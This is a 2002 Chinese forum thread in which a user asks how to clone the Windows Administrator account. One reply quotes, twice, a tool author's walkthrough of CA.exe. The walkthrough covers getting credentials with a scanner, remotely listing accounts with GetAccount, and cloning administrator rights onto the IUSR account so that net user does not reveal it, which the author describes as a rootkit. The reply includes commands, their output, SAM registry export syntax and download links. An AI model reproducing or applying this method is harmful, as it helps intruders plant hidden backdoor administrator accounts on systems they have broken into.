9,513
社区成员
发帖
与我相关
我的任务
分享克隆管理员帐号????必给分!
我无意中看到一篇介绍克隆管理员账号的文章,但是其中说的导出这个键值让我无法理解,因为注册表中根本就没有这样的键值啊!
regedit /e adam.reg hkey_local_machine\sam\sam\domains\account\users\000001f4
具体该如何做?给俺讲讲吧!
regedit /e adam.reg hkey_local_machine\sam\sam\domains\account\users\000001f4
具体该如何做?给俺讲讲吧!
...全文
请发表友善的回复…
发表回复
wangxinyes 2002-09-28
- 打赏
- 举报
谢了,给分
killhack 2002-09-27
- 打赏
- 举报
http://www.netxeyes.org/
小容的网站中有个叫ca的工具就是克隆管理员帐号的,原理在他的网站中说的很清楚,自已去看!
小容的网站中有个叫ca的工具就是克隆管理员帐号的,原理在他的网站中说的很清楚,自已去看!
hscoolbear 2002-09-27
- 打赏
- 举报
http://www.netXeyes.org/CCA.exe
[Clone Administrator] 2002/04/28
今天在NSFOCUS上面看到关于克隆系统帐号的文章,于是写了这个小工具CA(Clone Administrator)。
利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升,是一个不错的ROOT KIT.
用一个例子说明用法:
1、假定我们通过扫描器获得了192.168.0.1上用户test的密码为test(属于administrators组).
2、利用GetAccount(http://www.netXeyes.org/GetAccount.exe)获得系统中已经存在的帐号信息(当然利用空连接也可以)。
C:\>getaccount \\192.168.0.1 1
GetAccount Via SID, by netXeyes 2002/04/06
Connect Host 192.168.0.1 ....OK
Start Ememurate Account....
Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators
Disconnect Host 192.168.0.1 ....OK
3、利用CA.exe 将Iusr_victim克隆为Administrator。
C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com
Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK
C:\>
这时,iusr_victim就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。
在192.168.0.1上面用Net命令查看的结果:
User name IUSR_VICTIM
Full Name Internet Guest Account
Comment Built-in account for anonymous access to Internet I
nformation Services
User's comment Built-in account for anonymous access to Internet I
nformation Services
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2002/4/28 下午 10:31
Password expires Never
Password changeable 2002/4/28 下午 10:31
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2002/4/28 下午 09:02
Logon hours allowed All
Local Group Memberships *Guests
Global Group memberships *None
下载: http://www.netXeyes.org/CA.exe
--------------------
上文是在小榕那里找的。自己看看吧。希望对你有用。
其实原理也不是很难。只是一个SID而已。
在注册表里改成与ADMINISTRATOR一样的,但是在DOS下NET USER administrator时不会显示他而已。但是实际权限却与adminsitrator是一样的。:)呵呵,小弟也是刚刚学的。如果可以的话,大家一起学习吧。
嘿嘿~~~走了!
[Clone Administrator] 2002/04/28
今天在NSFOCUS上面看到关于克隆系统帐号的文章,于是写了这个小工具CA(Clone Administrator)。
利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升,是一个不错的ROOT KIT.
用一个例子说明用法:
1、假定我们通过扫描器获得了192.168.0.1上用户test的密码为test(属于administrators组).
2、利用GetAccount(http://www.netXeyes.org/GetAccount.exe)获得系统中已经存在的帐号信息(当然利用空连接也可以)。
C:\>getaccount \\192.168.0.1 1
GetAccount Via SID, by netXeyes 2002/04/06
Connect Host 192.168.0.1 ....OK
Start Ememurate Account....
Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators
Disconnect Host 192.168.0.1 ....OK
3、利用CA.exe 将Iusr_victim克隆为Administrator。
C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com
Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK
C:\>
这时,iusr_victim就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。
在192.168.0.1上面用Net命令查看的结果:
User name IUSR_VICTIM
Full Name Internet Guest Account
Comment Built-in account for anonymous access to Internet I
nformation Services
User's comment Built-in account for anonymous access to Internet I
nformation Services
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2002/4/28 下午 10:31
Password expires Never
Password changeable 2002/4/28 下午 10:31
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2002/4/28 下午 09:02
Logon hours allowed All
Local Group Memberships *Guests
Global Group memberships *None
下载: http://www.netXeyes.org/CA.exe
--------------------
上文是在小榕那里找的。自己看看吧。希望对你有用。
其实原理也不是很难。只是一个SID而已。
在注册表里改成与ADMINISTRATOR一样的,但是在DOS下NET USER administrator时不会显示他而已。但是实际权限却与adminsitrator是一样的。:)呵呵,小弟也是刚刚学的。如果可以的话,大家一起学习吧。
嘿嘿~~~走了!
wangxinyes 2002-09-27
- 打赏
- 举报
是在论坛中,还是在小榕的作品中,怎么找不到呢?
